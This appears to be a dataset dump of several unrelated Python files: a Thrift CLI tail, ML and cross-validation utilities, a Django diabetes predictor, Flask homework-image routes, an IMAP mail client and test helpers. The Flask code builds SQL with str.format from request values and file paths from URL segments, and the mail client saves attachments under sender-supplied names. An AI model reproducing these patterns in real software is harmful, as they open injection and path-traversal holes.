elif cmd == 'send':
if len(args) != 1:
print 'send requires 1 args'
sys.exit(1)
pp.pprint(client.send(args[0],))
elif cmd == 'batchSend':
if len(args) != 1:
print 'batchSend requires 1 args'
sys.exit(1)
pp.pprint(client.batchSend(args[0],))
elif cmd == 'process':
if len(args) != 1:
print 'process requires 1 args'
sys.exit(1)
pp.pprint(client.process(args[0],))
elif cmd == 'query':
if len(args) != 4:
print 'query requires 4 args'
sys.exit(1)
pp.pprint(client.query(args[0],args[1],args[2],args[3],))
elif cmd == 'replace':
if len(args) != 1:
print 'replace requires 1 args'
sys.exit(1)
pp.pprint(client.replace(args[0],))
elif cmd == 'batchReplace':
if len(args) != 1:
print 'batchReplace requires 1 args'
sys.exit(1)
pp.pprint(client.batchReplace(args[0],))
else:
print 'Unrecognized method %s' % cmd
sys.exit(1)
transport.close()
|
997,786 | 078fa9899379ada11f6bd1ed346190b08a820ebf | import numpy as np
def loaddata():
    """Load the training set from ex1data1.txt as a flat array of ints.

    NOTE(review): ex1data1.txt is usually the comma-separated Coursera
    dataset; an int dtype with a newline separator may not parse it as
    intended -- verify against the actual file format.
    """
    return np.fromfile("ex1data1.txt", int, sep="\n")
# Script entry point: load the data and run a couple of smoke checks.
if __name__ == "__main__":  # BUG FIX: was "__mian__", so this never ran
    traindata = loaddata()
    version = '1.0'
    # BUG FIX: was version.startswitch('1'), an AttributeError at runtime.
    print(version.startswith('1'))
    print('end')
    print("Hello the Pycharm!")
997,787 | 8151b86e80afb1f028b48be72576361ddd041ff4 | from py1811.sungJuk import SungjukService
# Build the grade service, read the current records, then compute and
# redisplay them (computeSungJuk appears to mutate std3 in place --
# TODO confirm against SungJukService).
sjsrv = SungjukService.SungJukService()
std3 = sjsrv.readSungJuk()
print(std3)
sjsrv.computeSungJuk(std3)
print(std3)
|
997,788 | 68f6dc6f0dae3667a5633397655455e3b06cfb65 | import socket
from threading import Thread, Condition
from downloadInThread import MyThread
import argparse
from collections import deque
from Queue import Queue
condition = Condition()
queue = []
class Server(Thread):
    """Producer thread: accepts TCP connections and pushes each received
    payload onto the shared module-level `queue`, signalling `condition`.

    The string "END" acts as a shutdown sentinel: it is queued for the
    consumer and then terminates this thread.
    """

    def __init__(self,host,port,name):
        Thread.__init__(self)
        self.port = port
        self.host = host
        self.name = name
        self.bufsize = 1024  # max bytes read per recv
        self.addr = (host,port)
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.bind(self.addr)

    def run(self):
        self.socket.listen(5)
        while True:
            print 'Waiting for connection..'
            client, caddr = self.socket.accept()
            print 'Connected To',caddr
            data = client.recv(self.bufsize)
            if not data:
                # Client closed without sending anything; wait for the next one.
                continue
            print data
            condition.acquire()
            queue.append(data)
            print "Produced", data
            condition.notify()
            condition.release()
            if data == "END":
                # Sentinel terminates the producer after it has been queued.
                return
class Client(Thread):
def __init__(self,host,port,name, delays, txpower, mintxpower, maxtxpower, incThreshold, decThreshold):
Thread.__init__(self)
self.port = port
self.host = host
self.name = name
self.bufsize = 1024
self.addr = (host,port)
self.delays = delays
self.txpower = txpower
self.mintxpower = mintxpower
self.maxtxpower = maxtxpower
self.incThreshold = incThreshold
self.decThreshold = decThreshold
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def run(self):
invalid = True
while invalid:
try:
invalid = False
self.socket.connect(self.addr)
except:
invalid = True
global queue
while True:
condition.acquire()
if not queue:
condition.wait()
num = queue.pop()
if num == "END":
return
num = float(num)
self.delays.append(num)
changePower = False
if len(self.delay) == self.delay.maxlen and self.delays.count(-1) >= self.incThreshold and self.txpower < self.maxtxpower:
self.txpower += 1
changePower = True
self.delays.clear()
elif len(self.delay) == self.delay.maxlen and self.delays.count(-1) <= self.decThreshold and self.txpower > self.mintxpower:
self.txpower -= 1
changePower = True
self.delays.clear()
if changePower:
commandVal = "set:tx-power:" + str(self.txpower)
print "Consumed", commandVal
self.socket.send(commandVal)
condition.release()
if __name__ == "__main__":
    progName = "downloadInThread"
    parser = argparse.ArgumentParser(prog = progName)
    parser.add_argument("-s", "--baseIP", dest="baseIP", help="server address")
    parser.add_argument("-c", "--commandIP", dest="commandIP", help="client address")
    parser.add_argument("-a", "--basePort", dest="basePort", help="server port", type=int)
    parser.add_argument("-b", "--commandPort", dest="commandPort", help="client port", type=int)
    parser.add_argument("-n", "--name", dest="name", help="Name")
    parser.add_argument("-d", "--downloadTime", dest="dTime", help="Download time")
    parser.add_argument("-k", "--sleepTime", dest="sTime", help="Sleep time")
    parser.add_argument("-i", "--iterations", dest="iteration", help="No. of iterations", type=int)
    args = parser.parse_args()
    # Wiring: Server produces delay samples into the shared queue, Client
    # consumes them and adapts tx power, MyThread performs the actual
    # download/sleep workload driven by the commands queued below.
    downloaderQ = Queue()
    downloaderThread = MyThread(downloaderQ, args=(True,))
    server = Server(args.commandIP, args.commandPort, args.name)
    client = Client(args.baseIP, args.basePort, args.name, deque(maxlen=15),22, 22, 27, 5, 2)
    server.start()
    client.start()
    downloaderThread.start()
    for i in range(0, args.iteration):
        downloaderThread.queue.put("download:"+args.dTime)
        downloaderThread.queue.put("sleep:"+args.sTime)
    # Sentinel tells the downloader thread to stop.
    downloaderThread.queue.put(None)
    downloaderThread.join()
    server.join()
|
997,789 | a5e88040e0a54f491bc605325bc9ee484cf50ce6 | from django.shortcuts import render
from django.http import HttpResponse
import numpy as np
import pandas as pd
# Create your views here.
from sklearn.externals import joblib
classifier=joblib.load('./models/RFModelforMPG.pkl')
def index(request):
    """Render the landing page pre-filled with the default form values."""
    defaults = {
        'ageVal': 50,
        'bs_fastVal': 6.8,
        'bs_ppVal': 8.8,
        'plasma_rVal': 11.2,
        'plasma_fVal': 7.2,
        'hbA1cVal': 62,
    }
    return render(request, 'index.html', {'temp': defaults})
def predictMPG(request):
    """Run the pre-loaded classifier on the six posted vitals and render
    the prediction into index.html.

    Non-POST requests simply re-render the page with a blank context.
    """
    context = {'temp': ' '}
    print(request)
    if request.method == 'POST':
        fields = ('ageVal', 'bs_fastVal', 'bs_ppVal',
                  'plasma_rVal', 'plasma_fVal', 'hbA1cVal')
        temp = {name: request.POST.get(name) for name in fields}
        # Convert the posted strings to floats, in the order the model expects.
        result = [float(temp[name]) for name in fields]
        prediction = classifier.predict([result])[0]
        # Confidence of the most likely class, in percent (computed but not
        # currently shown in the template, matching the original behavior).
        conf_score = np.max(classifier.predict_proba([result])) * 100
        # BUG FIX: str() guards against a TypeError when the model returns a
        # non-string label (e.g. a numpy integer).
        context = {'a': 'Diabetes Prediction :' + str(prediction), 'temp': temp}
    return render(request, 'index.html', context)
997,790 | 87c5d81d89e01ea4ab7ea4500a06abc5e69c7726 | import random
from signtest import compute_significance_two_tails
def crossvalidation(datas, class_count, disc, classifier, params={}, fold=10):
    """k-fold cross-validation; returns a summary string of per-fold
    classification rates and their average.

    Shuffles `datas` in place. Python 2 code (xrange, print statement,
    integer division). NOTE(review): params={} is a shared mutable
    default -- safe only while no caller mutates it.
    """
    random.shuffle(datas)
    one_fold_length = len(datas) / fold   # integer division (Python 2)
    fold_with_extra = len(datas) % fold   # the first folds get one extra item
    classification_rate = [0] * fold
    start = 0
    for i in xrange(0, fold):
        classifier.reset()
        if i < fold_with_extra:
            last = start + one_fold_length + 1
        else:
            last = start + one_fold_length
        test_set = datas[start:last]
        train_set = datas[0:start] + datas[last:]
        if params:
            classifier.train(train_set, class_count, params)
        else:
            classifier.train(train_set, class_count)
        print "{}th fold training over".format(i)
        # Count test items whose predicted label matches the gold label.
        correct = len(filter(lambda (data, label): classifier.classify(data, params=params) == label, test_set))
        classification_rate[i] = correct / float(len(test_set))
        start = last
        print "{}th fold over".format(i)
    result = ""
    result += "{} CR: {}, AVG: {}\n".format(disc, classification_rate,
                                            sum(classification_rate) / len(classification_rate))
    result += "\n\n"
    print result
    return result
# takes pre-precessed data - [(tokens, label)]
def crossvalidation_compare(datas, class_count, method1_disc, classifier_1, params_1, method2_disc, classifier_2,
                            params_2, fold=10):
    """k-fold cross-validation of two classifiers on identical folds, plus
    a paired sign test on their per-item wins.

    A tie (both classifiers give the same label) credits each side 0.5;
    otherwise the correct classifier gets the full win. Returns a summary
    string with both rate lists, averages, and the significance value.
    """
    random.shuffle(datas)
    one_fold_length = len(datas) / fold   # integer division (Python 2)
    fold_with_extra = len(datas) % fold
    classification_rate_1 = [0] * fold
    classification_rate_2 = [0] * fold
    start = 0
    win_1 = 0
    win_2 = 0
    for i in xrange(0, fold):
        correct_1 = 0
        correct_2 = 0
        classifier_1.reset()
        classifier_2.reset()
        if i < fold_with_extra:
            last = start + one_fold_length + 1
        else:
            last = start + one_fold_length
        test_set = datas[start:last]
        train_set = datas[0:start] + datas[last:]
        classifier_1.train(train_set, class_count, params_1)
        classifier_2.train(train_set, class_count, params_2)
        # (expected, prediction_1, prediction_2) per test item.
        result = []
        for data, expected in test_set:
            result.append(
                (expected, classifier_1.classify(data, params=params_1), classifier_2.classify(data, params=params_2)))
        for expected, r_1, r_2 in result:
            par = r_1 == r_2  # tie: both predicted the same label
            if par:
                win_1 += 0.5
                win_2 += 0.5
            if expected == r_1:
                correct_1 += 1
                if not par:
                    win_1 += 1
            if expected == r_2:
                correct_2 += 1
                if not par:
                    win_2 += 1
        classification_rate_1[i] = float(correct_1) / len(test_set)
        classification_rate_2[i] = float(correct_2) / len(test_set)
        start = last
    # Round the half-credits back to integers for the sign test.
    win_1 = int(round(win_1))
    win_2 = int(round(win_2))
    result = ""
    result += "{} CR: {}, AVG: {}\n".format(method1_disc, classification_rate_1,
                                            sum(classification_rate_1) / len(classification_rate_1))
    result += "{} CR: {}, AVG: {}\n".format(method2_disc, classification_rate_2,
                                            sum(classification_rate_2) / len(classification_rate_2))
    result += "Sig {}\n".format(compute_significance_two_tails(win_1, win_1 + win_2))
    result += "\n\n"
    print result
    return result
|
997,791 | 004eeb38bf2503633fdfc373d0cded865cb870be | __author__ = "Nikhil Mehta"
__copyright__ = "--"
#---------------------------
import tensorflow as tf
import numpy as np
import os
class DataHandler:
    """Loads, normalizes and batches the train/test splits (features,
    labels, class attributes) stored as numpy arrays under `data_dir`.

    Typical use: load_data() then preprocess_data(), then iterate with
    next_train_batch()/next_test_batch(). Python 2 code (print statements,
    text-mode file handles passed to np.load).
    """

    def __init__(self, data_dir):
        self.data_dir = data_dir
        self.test_data_loaded = False  # informational flag; not updated elsewhere in view

    def load_data(self):
        """Read class lists, labels, features and attributes from data_dir.

        Raises:
            IOError: if any of the expected files is missing.
        """
        train_class_file = os.path.join(self.data_dir, 'trainclasses_ps.txt')
        train_label_file = os.path.join(self.data_dir, 'trainLabels')
        train_data_file = os.path.join(self.data_dir, 'trainData')
        train_attr_file = os.path.join(self.data_dir, 'trainAttributes')
        test_class_file = os.path.join(self.data_dir, 'testclasses_ps.txt')
        test_label_file = os.path.join(self.data_dir, 'testLabels')
        test_data_file = os.path.join(self.data_dir, 'testData')
        all_attr_file = os.path.join(self.data_dir, 'dataAttributes')
        all_class_file = os.path.join(self.data_dir, 'allclasses.txt')
        if not os.path.exists(train_class_file) or \
           not os.path.exists(train_label_file) or \
           not os.path.exists(train_data_file) or \
           not os.path.exists(train_attr_file) or \
           not os.path.exists(test_class_file) or \
           not os.path.exists(test_label_file) or \
           not os.path.exists(test_data_file) or \
           not os.path.exists(all_class_file) or \
           not os.path.exists(all_attr_file):
            raise IOError("File cannot be read")
        # Map class name -> index over ALL classes (seen + unseen).
        self.all_classes = {}
        with open(all_class_file, 'r') as f:
            data = f.readlines()
            for idx, cl in enumerate(data):
                self.all_classes[cl.split()[0]] = idx
        with open(test_class_file, 'r') as f:
            data = f.readlines()
            self.test_classes = [self.all_classes[x.split()[0]] for x in data]
        with open(train_class_file, 'r') as f:
            data = f.readlines()
            self.train_classes = [self.all_classes[x.split()[0]] for x in data]
        # NOTE(review): np.load from a text-mode handle only works on
        # Python 2; use open(..., 'rb') if porting to Python 3.
        with open(all_attr_file) as f:
            self.all_attr = np.load(f)
        # Train files load
        self.load_train_data(train_class_file, train_label_file, train_data_file, train_attr_file)
        self.load_test_data(test_class_file, test_label_file, test_data_file, all_attr_file)

    def preprocess_data(self):
        """Z-normalize attributes and features.

        Attribute statistics are computed over all classes (available at
        training time); feature statistics use the training set only, so
        the test features never leak into the normalization.
        """
        print 'Preprocess'
        # Do everything here so i can remove this function if i want to
        # Preprocess c and x
        self.epsilon = 1e-6  # avoids division by zero for constant columns
        self.attr_mean = np.mean(self.all_attr, axis=0, keepdims=True) # Note all_attr (Seen and Unseen classes) available at training time
        self.attr_std = np.std(self.all_attr, axis=0, keepdims=True)
        print self.all_attr.shape
        print self.attr_mean.shape
        print self.attr_std.shape
        self.train_attr = np.divide(self.train_attr - self.attr_mean, (self.attr_std + self.epsilon))
        self.all_attr = np.divide(self.all_attr - self.attr_mean, (self.attr_std + self.epsilon))
        self.test_attr = np.divide(self.test_attr - self.attr_mean, (self.attr_std + self.epsilon))
        self.train_data_mean = np.mean(self.train_data, axis=0, keepdims=True)
        self.train_data_std = np.std(self.train_data, axis=0, keepdims=True)
        self.train_data = np.divide(self.train_data - self.train_data_mean, (self.train_data_std + self.epsilon))
        # Here only preprocessing the test data
        # Note: Test data has not been used for preprocessing (calculation of mean or std)
        self.test_data = np.divide(self.test_data - self.train_data_mean, (self.train_data_std + self.epsilon))

    def load_train_data(self, train_class_file, train_label_file, train_data_file, train_attr_file):
        """Load training labels/features/attributes and record dimensions."""
        with open(train_label_file) as f:
            self.train_label = np.load(f)
        with open(train_data_file) as f:
            self.train_data = np.load(f)
        with open(train_attr_file) as f:
            self.train_attr = np.load(f)
        self.train_size = self.train_data.shape[0]
        self.x_dim = self.train_data.shape[1]
        self.attr_dim = self.train_attr.shape[1]
        print 'Training Data: ' + str(self.train_data.shape)
        print 'Training Attr: ' + str(self.train_attr.shape)

    def load_test_data(self, test_class_file, test_label_file, test_data_file, all_attr_file):
        """Load test labels/features; test attributes are the rows of
        all_attr selected by the (unseen) test class indices."""
        with open(test_label_file) as f:
            self.test_label = np.load(f)
        with open(test_data_file) as f:
            self.test_data = np.load(f)
        self.test_attr = self.all_attr[self.test_classes]
        self.test_size = self.test_data.shape[0]
        print 'Testing Data: ' + str(self.test_data.shape)
        print 'Testing Attr: ' + str(self.test_attr.shape)
        print 'Testing Classes' + str(len(self.test_classes))
        print 'Testin Labels' + str(self.test_label.shape)

    def next_train_batch(self, index, batch_size):
        """Return the (features, attributes) training slice [index, index+batch_size)."""
        start_index = index
        end_index = index+batch_size
        return self.train_data[start_index:end_index], self.train_attr[start_index:end_index]

    def next_test_batch(self, index, batch_size):
        """Return the (features, attributes) test slice [index, index+batch_size)."""
        start_index = index
        end_index = index+batch_size
        return self.test_data[start_index:end_index], self.test_attr[start_index:end_index]
|
997,792 | 585c4958b50e0d3e4d1deb43c8b607864cd66d52 | import os
import json
import logging
from flask import (Blueprint, flash, g, redirect, render_template, request,
url_for, make_response, send_from_directory)
from werkzeug.exceptions import abort
from app.db import get_db, close_db
from app.auth import login_required
bp = Blueprint('hw', __name__)
@bp.route('/hw_img/<context>', methods=('GET', 'POST'))
def hw_img(context):
    """Return the raw PNG bytes of the problem image for homework `context`.

    NOTE(review): `context` comes straight from the URL and is used to
    build a filesystem path; validate it (reject '/' and '..') to prevent
    path traversal.
    """
    # Removed an unused `import base64` and a dead img_stream pre-init.
    with open('./files/hw/' + context + '/prob.png', 'rb') as f:
        return f.read()
@bp.route('/sp_prob_img/<context>', methods=('GET', 'POST'))
def sp_prob_img(context):
    """Return the raw PNG bytes of the special-exercise problem image.

    NOTE(review): `context` is URL-controlled and becomes part of a path;
    validate it against path traversal.
    """
    # Removed an unused `import base64` and a dead img_stream pre-init.
    with open('./files/sp_exe/' + context + '/prob.png', 'rb') as f:
        return f.read()
@bp.route('/sp_ans_img/<context>', methods=('GET', 'POST'))
def sp_ans_img(context):
    """Return the raw PNG bytes of the special-exercise answer image.

    NOTE(review): `context` is URL-controlled and becomes part of a path;
    validate it against path traversal.
    """
    # Removed an unused `import base64` and a dead img_stream pre-init.
    with open('./files/sp_exe/' + context + '/ans.png', 'rb') as f:
        return f.read()
# Record hw_history
def record_hw_history(user_ip, operation, context=None):
    """Append a row to hw_history for the logged-in user.

    Only operations 1 and 2 are recorded, and both require `context`
    (the homework identifier used to look up hw_id). Anonymous users
    (g.user empty or missing) are silently skipped.

    NOTE(review): the SQL is built with str.format from request-derived
    values (context, user_ip) -- switch to parameterized queries to
    prevent SQL injection.
    """
    if (g.user != '{}') and (g.user is not None):
        user_id = json.loads(g.user)['id']
        if (operation == 1 or operation == 2) and context:
            db = get_db()
            df = db.fetchall(
                'SELECT id FROM hw_info WHERE context="{context}"'.format(
                    context=context))
            hw_id = df.id[0]
            db.execute(
                'INSERT INTO hw_history (user_id, user_ip, hw_id, operation, time) VALUES ({user_id}, "{user_ip}", {hw_id}, {operation}, now())'
                .format(user_id=user_id,
                        user_ip=user_ip,
                        hw_id=hw_id,
                        operation=operation))
            db.commit()
            close_db()
# Record sp_exe_history
def record_sp_exe_history(context,
                          user_ip,
                          operation,
                          ans="null",
                          difficulty="null",
                          answer_easy_if="null"):
    """Append a row to sp_exe_history for the logged-in user.

    The string "null" defaults are interpolated unquoted so they become
    SQL NULL in the INSERT. Anonymous users are skipped, but the db
    handle is still closed.

    NOTE(review): the SQL is built with str.format from request-derived
    values -- switch to parameterized queries to prevent SQL injection.
    """
    db = get_db()
    if (g.user != '{}') and (g.user is not None):
        user_id = json.loads(g.user)['id']
        df = db.fetchall(
            'SELECT id FROM sp_exe_info WHERE context="{context}"'.format(
                context=context))
        sp_exe_id = df.id[0]
        db.execute(
            'INSERT INTO sp_exe_history (user_id, user_ip, sp_exe_id, operation, time, ans, difficulty, answer_easy_if) VALUES ({user_id}, "{user_ip}", {sp_exe_id}, {operation}, now(), {ans}, {difficulty}, {answer_easy_if})'
            .format(user_id=user_id,
                    user_ip=user_ip,
                    sp_exe_id=sp_exe_id,
                    operation=operation,
                    ans=ans,
                    difficulty=difficulty,
                    answer_easy_if=answer_easy_if))
        db.commit()
    close_db()
# Check submit status with { user_id, hw_id }
# Check submit status with { user_id, hw_id }
def check_submitted(context, operation):
    """Return (submitted, time) for the current user / homework / operation.

    (True, timestamp-of-first-record) when at least one matching
    hw_history row exists; (False, None) otherwise or for anonymous users.

    NOTE(review): indentation reconstructed from a whitespace-mangled
    source; SQL is format-built from `context` -- parameterize it.
    """
    db = get_db()
    if (g.user != '{}') and (g.user is not None):
        user_id = json.loads(g.user)['id']
        df = db.fetchall(
            'SELECT id FROM hw_info WHERE context="{context}"'.format(
                context=context))
        hw_id = df.id[0]
        df = db.fetchall(
            'SELECT * FROM hw_history WHERE user_id="{user_id}" AND operation={operation} AND hw_id={hw_id}'
            .format(user_id=user_id, operation=operation, hw_id=hw_id))
        amount = len(df)
        close_db()
        if amount >= 1:
            return True, df.iloc[0].time
        elif amount == 0:
            return False, None
    else:
        close_db()
    return False, None
|
997,793 | 0202b0c94690844c29540f6b846e8da5ae07f91e | from tkinter.constants import END
from tkinter import simpledialog
from tkinter import messagebox
import imap_tools
attachment_path = "./attachment/"
dictionary_email = {}
login_list = []
def imap_login(window):
    """Prompt for Gmail credentials via dialogs until an IMAP login succeeds.

    Side effect: appends the accepted email and password to the global
    login_list. Returns the logged-in imap_tools MailBox.
    """
    global login_list
    while 1:
        window.update_idletasks()
        email = simpledialog.askstring("email", "inserisci la tua email")
        window.update_idletasks()
        password = simpledialog.askstring(
            "password", "inserisci la tua password")
        mailbox = imap_tools.MailBox("imap.gmail.com")
        try:
            mailbox = mailbox.login(email, password)
            break
        except Exception:
            # Bad credentials (or connection failure): tell the user and retry.
            messagebox.showerror("Error", "Dati non validi")
    login_list.append(email)
    login_list.append(password)
    print(mailbox)
    return mailbox
def receive_email(listEmail, window):
    """Fetch all messages from the mailbox, cache them in the global
    dictionary_email, and add a "sender subject" line per message to the
    listbox `listEmail`.

    Each dictionary_email[i] entry is a list:
    [from, subject, body, ("Allegato: name", payload) pairs flattened...].
    """
    global dictionary_email
    s = ""
    i = 0
    mailbox = imap_login(window)
    for msg in mailbox.fetch():
        foo = []  # accumulated fields for this message
        print(f"Da: {msg.from_}\nOggetto: {msg.subject}\nBody: {msg.text}")
        foo.append(f"Da: {msg.from_}")
        foo.append(f"Oggetto: {msg.subject}")
        foo.append(msg.text)
        s += f"{msg.from_} {msg.subject}"
        for att in msg.attachments:
            print(f"Allegato: {att.filename}, {att.content_type}\n")
            foo.append(f"Allegato: {att.filename}")
            foo.append(att.payload)
        dictionary_email[i] = foo
        listEmail.insert(END, s)
        i += 1
        s = ""
def download_attachments(i):
    """Save the (last) attachment of cached e-mail `i` into attachment_path.

    dictionary_email[i] ends with ["Allegato: <filename>", payload] as
    built by receive_email().
    """
    entry = dictionary_email[i]
    # BUG FIX: the old code split on every space and kept the last token,
    # truncating filenames that contain spaces. Split off the label once.
    filename = entry[-2].split(": ", 1)[1]
    # NOTE(review): filename originates from the e-mail sender; sanitise it
    # against path traversal before writing to disk.
    with open(attachment_path + filename, "wb") as f:
        f.write(entry[-1])
    messagebox.showinfo("info", "Ho scaricato il file")
|
997,794 | 33689be0f96cf9020252dbf7df20f84b10b225ad | import os
import random
import string
from typing import Optional, Tuple
import healpy
import pytest
from precovery.orbit import Orbit
from precovery.sourcecatalog import SourceFrame, SourceObservation
def make_sourceobs(
    exposure_id: str = "exposure",
    id: Optional[bytes] = None,
    obscode: str = "obs",
    healpixel: Optional[int] = None,
    nside: int = 32,
    ra: float = 1.0,
    dec: float = 2.0,
    mjd: float = 50000.0,
    exposure_mjd_start: float = 50000.0,
    exposure_mjd_mid: float = 50000.0,
) -> SourceObservation:
    """Constructor for SourceObservations which provides default
    values for anything unspecified, which makes test setup less
    verbose.

    If `healpixel` is given it overrides `ra`/`dec` with coordinates
    inside that pixel (at resolution `nside`); if `id` is omitted a
    random 16-character lowercase ASCII id is generated.
    """
    if id is None:
        id = random_string(16).encode("utf8")
    if healpixel is not None:
        # Place the observation at the center of the requested pixel.
        ra, dec = radec_for_healpixel(healpixel, nside)
    return SourceObservation(
        exposure_id=exposure_id,
        obscode=obscode,
        id=id,
        mjd=mjd,
        ra=ra,
        dec=dec,
        ra_sigma=3.0,
        dec_sigma=4.0,
        mag=5.0,
        mag_sigma=6.0,
        filter="filter",
        exposure_mjd_start=exposure_mjd_start,
        exposure_mjd_mid=exposure_mjd_mid,
        exposure_duration=30,
    )
def make_sourceobs_of_orbit(
    orbit: Orbit,
    obscode: str,
    mjd: float = 50000.0,
):
    """Make a SourceObservation lying exactly on `orbit`'s ephemeris as
    seen from observatory `obscode` at epoch `mjd`."""
    ephem = orbit.compute_ephemeris(obscode=obscode, epochs=[mjd])[0]
    obs = make_sourceobs(
        mjd=mjd, exposure_mjd_mid=mjd, obscode=obscode, ra=ephem.ra, dec=ephem.dec
    )
    return obs
def make_sourceframe_with_observations(
    n_observations: int,
    exposure_id: str = "exposure",
    obscode: str = "obs",
    exposure_mjd_start: float = 50000.0,
    exposure_mjd_mid: float = 50000.0,
    healpixel: int = 1,
) -> SourceFrame:
    """Constructor for SourceFrames which provides default
    values for anything unspecified, which makes test setup less
    verbose. `n_observations` SourceObservations inside `healpixel`
    are generated and included.
    """
    observations = [
        make_sourceobs(
            exposure_id=exposure_id,
            obscode=obscode,
            healpixel=healpixel,
            mjd=exposure_mjd_mid,
            exposure_mjd_start=exposure_mjd_start,
            exposure_mjd_mid=exposure_mjd_mid,
        )
        for _ in range(n_observations)
    ]
    return SourceFrame(
        exposure_id=exposure_id,
        obscode=obscode,
        filter="filter",
        exposure_mjd_start=exposure_mjd_start,
        exposure_mjd_mid=exposure_mjd_mid,
        exposure_duration=30.0,
        # BUG FIX: was hard-coded to 1, silently ignoring the `healpixel`
        # parameter (while the observations above DID use it).
        healpixel=healpixel,
        observations=observations,
    )
def radec_for_healpixel(healpixel: int, nside: int) -> Tuple[float, float]:
    """
    Compute the ra and dec associated with a healpixel.

    Returns (lon, lat) in degrees (healpy `lonlat=True`), using the
    NESTED pixel ordering.
    """
    return healpy.pix2ang(nside=nside, ipix=healpixel, nest=True, lonlat=True)
def random_string(length: int):
    """Return a random string of `length` lowercase ASCII letters."""
    alphabet = string.ascii_lowercase
    return "".join(random.choice(alphabet) for _ in range(length))
requires_openorb_data = pytest.mark.skipif(
"OORB_DATA" not in os.environ,
reason="test requires propagation, so OORB_DATA environment variable must be set",
)
|
997,795 | c93638f3cd8de1b9d4950c3d8ceaaf46e477713d | from regularizationNetworks import MixGauss
import scipy.io as sio
import numpy as np
import os.path
# Generate 2-D Gaussian-mixture train and test sets (Python 2 script:
# uses raw_input).
[Xtr, Ytr] = MixGauss.mixgauss(np.matrix('0 1; 0 1'), np.matrix('0.5 0.25'), 100)
[Xts, Yts] = MixGauss.mixgauss(np.matrix('0 1; 0 1'), np.matrix('0.5 0.3'), 100)
flag = True
# Ask for a dataset name under ../datasets, re-prompting unless the user
# confirms overwriting an existing .mat file.
while flag:
    file_name = raw_input('Insert the dataset name ')
    file_name = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'datasets/'+file_name)
    if os.path.isfile(file_name + '.mat'):
        choose = raw_input('A file with this name already exists, do you want to override it? (y/n) ')
        if choose == 'y':
            flag = False
        else:
            flag = True
    else:
        flag = False
sio.savemat(file_name, {'Xtr': Xtr, 'Ytr': Ytr, 'Xts': Xts, 'Yts': Yts})
|
997,796 | a2a66aa34cdf521393e44e1ec95ea9c856391cdf | def sum(r):# 若函数中的局部变量和全局变量的变量名一样,那么优先使用局部变量
pi=3.14 # 局部变量
return (pi*2*r)
# Read a radius from the user (global variable, arrives as a string).
r=input("请输入半径:")
if r.isdigit():
    # isdigit() accepts only non-negative integers, so e.g. "3.5" is rejected.
    print(sum(float(r)))
else:
    print("输入有误")
|
997,797 | 8c1735f8b6a0d5a1f683bab7a39b2f66218405d4 | """Meat Engine
Copyright (C) 2007, Big Dice Games
One practical definition of a "game engine" is "the code you reuse on
your second game". That's mostly tongue-in-cheek, but it isn't far
from the philosophy of what's currently included in MeatEngine.
I've included a variety of pieces of code, not because they're all
appropriate for the game you want to make, and they're certainly not
all appropriate for any particular game, but instead, each piece might
be useful for some game, or for some game-related-project.
MeatEngine is more of a toolbox than a framework - you're responsible
for the main loop of your program. Some of the code makes certain
assumptions about being called periodically. This should not be
difficult to handle, regardless of the structure of your game.
Included (currently) are modules for adaptive music, GUI display, AI,
and low-level math. Also included is the beginnings of a ray tracer -
not that you'd want to use a ray tracer in your game (certainly not
this ray tracer, anyway), but it may be of benefit in creating
assets. Also, it serves as a test harness for the math module.
Version History
--------------------
0.0.1 - Initial packaging in advance of PyWeek5
"""
__all__ = ['MoodMusic', 'Math', 'Widgets', 'LookAhead', 'RayTrace']
__version__ = "0.0.1"
__docformat__="restructuredtext en"
|
997,798 | 3d75b0f9947e55bbc0a7b5bf6d88f5bd2c1ac33a | # Alec Dewulf
# "Hidden Palindrome" 2016 J3
# December 31, 2019
# Find the longest palindromic substring length in the input string.
# Strategy: expand around every possible center -- first odd-length
# (single-letter middle), then even-length (two-letter middle) -- and
# collect every palindrome length found; print the maximum (or 1).
# NOTE(review): indentation reconstructed from a whitespace-mangled source.
pal = input()
lengths = []
x = 1
y = 1
# getting lengths of palindromes that have a middle consisting of 1 letter
while x < len(pal) - 1:
    # checking to make sure the guess is within the length of the palindrome
    while (x + y) < len(pal) and (x - y) >= 0:
        if pal[x - y] == pal[x + y]:
            # multiply ans by two for the letters on both sides and
            # add the middle
            ans = (2 * y) + 1
            lengths.append(ans)
            y += 1
        else:
            break
    y = 1
    x += 1
y = 1
x = 1
# getting the lengths of palindromes that have a middle of 2 letters
while x < len(pal) - 1:
    # checking for a two letter middle
    if pal[x] == pal[x + 1]:
        y = 1
        # finding the largest palindrome
        while (x + 1 + y) < len(pal):
            # the digits after the two digit middle are the same
            if pal[x - y] == pal[x + y + 1] and (x-y) >= 0:
                ans = (2 * y) + 2
                lengths.append(ans)
                y +=1
            else:
                break
    x += 1
# check the list for pals of length two (only needed when nothing longer
# was found above, since the even loop records extensions but not bare pairs)
if len(lengths) == 0:
    for i in range(len(pal)):
        # if two of the same letters are beside each other
        if (i+1) < len(pal):
            if pal[i] == pal[i +1]:
                lengths.append(2)
# returning the answer which is the greatest length found
if len(lengths) != 0:
    print(max(lengths))
else:
    print(1)
|
997,799 | 64dfc5c96aea30d0e420ba9ef1000325711638a6 | import math
import numpy
import matplotlib
matplotlib.use('TkAgg')
from skimage import io
from skimage import feature
from skimage import draw
from skimage import util
from skimage import color
from skimage import morphology
from skimage import filters
from skimage import measure
from skimage import transform
from skimage import exposure
from sklearn.neighbors import NearestNeighbors
from scipy import ndimage as ndi
#import matplotlib.pyplot as plt
from matplotlib.figure import Figure
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
import sys
if sys.version_info[0] < 3:
import Tkinter as Tk
from tkinter import messagebox
else:
import tkinter as Tk
from tkinter import messagebox
from scipy.spatial import Delaunay
import Si_Ring_Classes
import matplotlib.pyplot as plt
# Module-level configuration flags for the ring-center finder.
light_centers = False
#170908_SiO2@RuVII_STM110_det (27.4x11.5).jpg
save_figures = False
#Colors for each of the ring numbers
colors = [[178, 112, 248], [75, 176, 246], [67, 196, 127], [249, 222, 62], [249, 76, 62], [247, 38, 232]]
scaling_factor = 1
#Sets up the Tk window
root = Tk.Tk()
root.wm_title("Auto Ring Center Finder")
# Sample data: ring sizes per distance bin, and each bin's midpoint.
bin_list = [[5,6,7,8],[6,6,7],[6,6,6,6,6,8],[6,6,6,6,6,6]]
bin_mids = [0.5,1,1.5,2]
